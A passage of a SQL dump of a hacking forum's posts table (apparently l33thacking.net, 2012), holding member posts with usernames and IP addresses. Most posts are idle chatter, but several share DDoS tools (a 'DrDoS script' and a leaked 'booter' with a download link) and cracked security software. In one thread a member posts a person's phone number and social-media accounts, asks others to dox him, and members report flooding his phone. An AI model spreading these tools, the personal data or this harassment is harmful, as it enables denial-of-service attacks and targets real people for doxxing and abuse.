'0', '0', '0', '1', '17de725e1dd379241273e58f25281991', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3162', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '82', 'iTzIpod', '1349143247', 'Yeah. And our next goal for posts is probably 5k. But we\'re still gonna make a 4k thread achievement. Since it boosts up our total threads.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c795c40ca97a91568548c2dba66e60c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3163', '641', '3113', '42', 'RE: File-Sharing for Personal Use Declared Legal in Portugal', '0', '5', 'Timmy', '1349143265', 'The introduction has been copied and pasted twice.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '20b00087d68a123c69111f42cc2134f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3164', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349143304', 'l33thacking.net Lool was trying to advertise our forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd9b20288c222754e9e521b829b3319f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3165', '629', '3047', '21', 'RE: [FREE] Giving Away DrDos Script [FREE]', '0', '5', 'Timmy', '1349143306', 'Nice signature and can I have this please? PMing you now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '305d8f7c4024ae1ca7dca5dd568c4bde', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3166', '496', '2408', '14', 'RE: Free Proxy List', '0', '5', 'Timmy', '1349143366', 'Quite funny that this only has two views lol. Thanks for the list.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6689d6ca12099b5a0d2aba8cd6132df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3167', '647', '0', '14', 'VPNReactor (Free/Paid) **Deletes Logs**', '0', '5', 'Timmy', '1349143704', '[b]Protect your privacy on the internet - FREE[/b] [list] [*]Free easy-to-use App for Windows and Mac [*]Works on all platforms, Windows, Mac OSX, Iphone etc. [*]256-Bit Encrypted connection between you and the internet [*]Total Privacy, no records of your internet activities are kept [*]US, UK, & Europe based VPN Servers [*]Unlimited Bandwidth - No speed caps! [*]Instant Access [*]FREE!! [/list] VPNReactor is a good VPN, free and deletes logs in 2 weeks. It\'s fast plus easy to setup. In paid version you can connect anywhere you want and doesn\'t keep logs at all. Link: https://www.vpnreactor.com/default.aspx', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5c8760bd789075d601275154faf0da46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3168', '634', '3075', '7', 'RE: Depressed', '0', '5', 'Timmy', '1349143773', 'Sorry I don\'t know how it feels but all i can say is move on, stay strong and good luck with life.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8b6107256c3123db0a82977cca6a1bf3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3169', '496', '2408', '14', 'RE: Free Proxy List', '0', '82', 'iTzIpod', '1349143784', 'Are you talking about the thread? O_o No problem.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b6479f2954506e4ae19a2d37cd1c1bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3170', '253', '1106', '56', 'RE: Count to 200', '0', '5', 'Timmy', '1349143812', '23. Lets finish this game already.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '275cb23c41525eaa89290635157e57d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3171', '190', '665', '56', 'RE: Copy and paste game', '0', '5', 'Timmy', '1349143846', 'https://www.vpnreactor.com/default.aspx', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '54ce4e60507e2472c0fe61942bcf404d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3172', '648', '0', '19', '[Junk]Testing', '0', '82', 'iTzIpod', '1349143901', 'Testing. [Mod] I\'m cool [/mod] Testing.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4babc4a3e0988c76182f353680eb8ebb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3173', '539', '3161', '4', 'RE: YO WHAT UP!', '0', '1', 't3h jok3r', '1349143929', '[quote=\'NeonLights\' pid=\'3161\' dateline=\'1349143147\'] testing to see if my sig works having problems [/quote] I can see your signature. Try clearing your cache.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ddb2d91707cf2ca3363303d07b7b102d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3174', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349143952', 'http://i.minus.com/ib1w4ZB084LUHN.jpg My sig :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dc23c46b5831419c9c10f3b50da74054', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3175', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349143989', '24. Yeah agreed with Timmy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a9d5c0c0f0742d4d44da3bc371f3188d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3176', '648', '3172', '19', 'RE: Testing', '0', '1', 't3h jok3r', '1349144005', 'May I know what\'s this thread doing here? We have a Mods testing forum and mostly test threads belong in the off topic forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '56bd901c0d47be210537bc2f68e0df06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3177', '648', '3172', '19', 'RE: Testing', '0', '82', 'iTzIpod', '1349144129', 'I\'m trying to test my Moderation tools in this section. Sorry. Before it didn\'t work. Kept leading me to an error. [hr] This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '82', '1349144138', '1', '3b7ce975e87ec59cb25132f29b60d791', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3178', '645', '3154', '30', 'RE: [GET] Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked !', '0', '2', 'Apathy', '1349144679', 'You have tested personally?', '173.206.138.218', '-1378972966', '0', '0', '0', '0', '1', '640c299d8da304e37c2354034f847c0b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3179', '649', '0', '3', 'Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349144845', 'I have attached a picture in this thread which shows our monthly statistics. I\'m glad that September beat Augusts posting activity. We are going good this month as we have 90 posts and 14 threads already (Excluding this thread) P.S: June was when LH was made so moderations were going on and we had no members so exclude June from the list. [u]Sincere thanks for the following members[/u] [url=http://l33thacking.net/user-82.html]iTzIpod[/url] [url=http://l33thacking.net/user-199.html]Anonymous™[/url] [url=http://l33thacking.net/user-100.html]iTzGRONgamer61[/url] [url=http://l33thacking.net/user-205.html]mothered[/url] [url=http://l33thacking.net/user-203.html]NeonLights[/url] [url=http://l33thacking.net/user-61.html]NXK[/url] [url=http://l33thacking.net/user-62.html]R?????zo?[/url] [url=http://l33thacking.net/user-5.html]Timmy[/url] [url=http://l33thacking.net/user-112.html]??????Z[/url] [url=http://l33thacking.net/user-4.html]Triple H[/url] [url=http://l33thacking.net/user-8.html]Spacefish36[/url] [url=http://l33thacking.net/user-9.html]p420[/url] [url=http://l33thacking.net/user-10.html]swa4567[/url] Thanks to people that are away or banned. [url=http://l33thacking.net/user-20.html]JakeUS[/url] [url=http://l33thacking.net/user-67.html]HoverCatz[/url] [url=http://l33thacking.net/user-53.html]sirchamp[/url] [url=http://l33thacking.net/user-54.html]Sin Cara[/url]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7191945e78f293874cb2f6ee73423f4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3180', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '82', 'iTzIpod', '1349145283', 'First day of October. 90 Posts. Not a bad start. 90x31=2790! :D Threads will be boosted in Unique. Imma be spamming posts + threads. (HQ obviously). Check em out. Not in Unique? Too bad. Try to be HQ, or apply.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3e98ac568d84ebb471f4cc1f6333c488', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3181', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349146018', 'I don\'t need to be in unique because I am unique and I can view your forum already so...', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b9c589b6f55e440c46d2c3a1ee25062d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3182', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1349146067', '25. 175 left to go :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ee82680b8b6f092a493636243640534a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3183', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1349147246', 'Just for an update. I have planned all the forums, sub-forums, name, ficons and descriptions. So the gaming section will be out soon but please refer your gaming friends over here. I\'m also planning to add a forum to get all the cheats, walk-through and codes. The only special gaming forum we will have will be Minecraft other than that we will have forums such as consoles, online gaming, lounge, cheats, mobile gaming etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b15d8e9ce67a49934cc4f76ab5e78b89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3184', '479', '2329', '49', 'RE: [Suggestion] Forum Logo resized', '0', '1', 't3h jok3r', '1349147323', 'To let everyone know that I have tried every possible way to center the logo but it didn\'t work. The theme we are on has a lot of bugs and issues and overtime I have fixed them all. I need more time.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e6118d9c853f990d140c3185a6c4ce94', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3185', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1349147406', 'Closing this thread due to no votes. Create 2-4 A or B threads in the Lounge and I\'ll see if they are active or not.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a1041f02553330ec74b5b25441c43a53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3186', '253', '1106', '56', 'RE: Count to 200', '0', '199', 'Anonymous™', '1349166759', '26. Almost 200 now! -> :D', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '0ef85f029442c715c95eec9770d5516a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3187', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349166888', 'http://www.youtube.com/watch?v=PVzljDmoPVs&feature=g-logo-xit - David Guetta - She Wolf (Falling to Pieces) ft. Sia', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'a8faf5a3efcb62302ce703034c8dcc9c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3188', '488', '2355', '8', 'RE: What are you listening to?', '0', '199', 'Anonymous™', '1349166948', 'David Guetta - She Wolf (Falling to Pieces) ft. Sia', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'bd4a1702b220b83b214bba241aeee5c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3189', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '199', 'Anonymous™', '1349167070', 'Thanks, I\'ll write some more tuts later today!', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '20d1faf23ba5aa77fb98e8e2e31bdfd6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3190', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '199', 'Anonymous™', '1349167471', '[b]Username:[/b] Anonymous™ [b]Name:[/b] Jacob [b]Age:[/b] 16 [b]Profile:[/b] http://l33thacking.net/user-199.html [b]Why I should join Gamers: [/b] I love to play games I\'m a hardcore gamer, I play maybe 20 hours and sleeps four, I like to play on both consoles and PC. Sorry for LQ but I have not much time do you want to know something more or have more HQ answers PM me.', '85.230.50.38', '1441149478', '1', '0', '199', '1349167515', '1', 'd583611090e59aad9286c08dc29d77ba', '0', '1349167515'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3191', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '199', 'Anonymous™', '1349185688', 'I\'ve never heard of it so who knows?', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'ebb4ed62b0e55e794cd9f578ead3fa28', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3192', '629', '3047', '21', 'RE: [FREE] Giving Away DrDos Script [FREE]', '0', '100', '??zg???g????61', '1349187731', 'Sent you it ;D Happy DDoS\'ing', '46.249.57.80', '788085072', '1', '0', '0', '0', '1', '99c13091190e4b1478489b80989fee1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3193', '650', '0', '61', '[LEAK] ShockwaveBooter (V4.2) [FREE]', '8', '100', '??zg???g????61', '1349189593', 'ShockwaveBooter (V4.2), ADD YOUR OWN SHELLS!!! Leaked this from HF, its a paid booter ;D enjoy!! [url=https://www.virustotal.com/file/133c47d6d23efeb06b370a6b208e0aede0bf8f2412a1aede547c68e45dd5f18d/analysis/]Virus Scan[/url] [url=http://adf.ly/DMlkF]Download[/url]', '46.249.57.80', '788085072', '1', '0', '0', '0', '1', 'f68ee42ba888e966ce172ce056bb9a64', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3194', '650', '3193', '61', 'RE: [LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '61', 'NXK', '1349191780', 'Id never use this but nice contribution. I\'m starting to get sick of HF. community is filled with 7 yearolds', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '31bfb2b4a8cc3cc7acf2607c9b74a8bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3201', '650', '3193', '61', 'RE: [LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '100', '??zg???g????61', '1349207839', 'You took the words right out of my mouth.', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'a967770c23ac86b288adf991d9357e09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3202', '637', '3150', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349212399', '[quote=\'t3h jok3r\' pid=\'3150\' dateline=\'1349138540\'] Honestly I never SE\'d Logitech. I know someone who can SE a gaming keyboard for you, I will ask them and let you know. [/quote] thanks I still need this, let me know if ou get someone. since iTzIpod is busy lately.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '59b9f30e609087edf5e70622e4f03b9c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3203', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '82', 'iTzIpod', '1349218508', 'Terribly sorry though dude. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '95141213592c4c5de1ead1a53f44fc70', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3204', '466', '2201', '13', 'RE: How to BruteForce a VPS!', '0', '214', 'Rave™', '1349220221', 'You stole my tutorial off of Ubers.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '6e1d7e7017918a3ea1636e77517a58b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3205', '466', '3204', '13', 'RE: How to BruteForce a VPS!', '0', '61', 'NXK', '1349220795', '[quote=\'Kasual\' pid=\'3204\' dateline=\'1349220221\'] You stole my tutorial off of Ubers. [/quote] Ill make sure he provides credits.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0c9138de2a89b79cd6e5547110f3658a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3206', '652', '0', '7', 'Being CyberBullied', '0', '82', 'iTzIpod', '1349221795', 'But anyways. This is the only piece of information on him that I got. I will update this thread later. I want someone to dox this skid. Really I don\'t like him. He was cyberbullying me saying shit he wouldn\'t say face to face. Says I look like a faggot with my ugly snappie (Snapback) and also how I am not funny and shit. Like bitch. Calling me ugly doesn\'t make you look like a super model or some shit. Like this skid is gonna get revenge.. And I need your help.. I got his - Cell Number 647-808-0433 - Twitter @HotFuckinMess - Facebook http://www.facebook.com/yourmomtapthat - Another Facebook http://www.facebook.com/christian.henriquez.3766', '24.212.197.164', '416597412', '1', '0', '82', '1349224440', '1', 'ed29ef2e33e7f66da19bad1b000585dd', '0', '1349224440'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3207', '652', '3206', '7', 'RE: Being CyberBullied', '0', '100', '??zg???g????61', '1349224651', 'This is going to be fun.. [hr] I\'m bombing his phone now ;D', '65.96.215.138', '1096865674', '1', '0', '100', '1349224682', '1', '0c04e6a6a7eb215571cca9d70549e737', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3208', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349225825', 'His twitter is hot fucking mess? Oh god this is going to be fun. spamming his phone also.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'df3a5ddc7ae919edcd4994a50b5271ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3209', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349228484', 'Well. He made a status about me.. Saying that I look like a faggot and my jokes aren\'t funny. Plus I don\'t remember talking to him or saying any jokes to him.. -.- He\'s just lurking on Facebook looking at my posts or something. Anyways. Will post a picture of his status some day. Probably tomorrow or so. Busy with a lot of stuff.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb9699a5c919bbbb893737bc608d9455', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3210', '652', '3206', '7', 'RE: Being CyberBullied', '0', '1', 't3h jok3r', '1349231926', 'People say never mess with a gangster but the truth is that a gangster might quit and consider some things impossible to accomplish but for a hacker nothing is impossible. Hackers are decent people with just a bit twisted mind. They cool with everyone but when someone messes with them they won\'t give two fucks about them anymore.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4aa6e95fa9336c898412bdb31056f95d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3211', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1349231980', '28. I miss the 9 after the 8.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '131b02da1177f184a6727a0e1d25f6a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3212', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349232026', 'Lol Reborn and I am unique because are the heads and not everyone out here runs LH so that makes us unique :P', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f212f02168dea966c598f92574d3bc5c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3213', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '3', '??????????¢™', '1349232034', 'Hey, You forgot to add me in it. Awwwww man.', '75.22.59.99', '1259748195', '1', '0', '1', '1349232757', '1', '2baca0f111326440cba93f46cd08a000', '0', '1349232757'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES 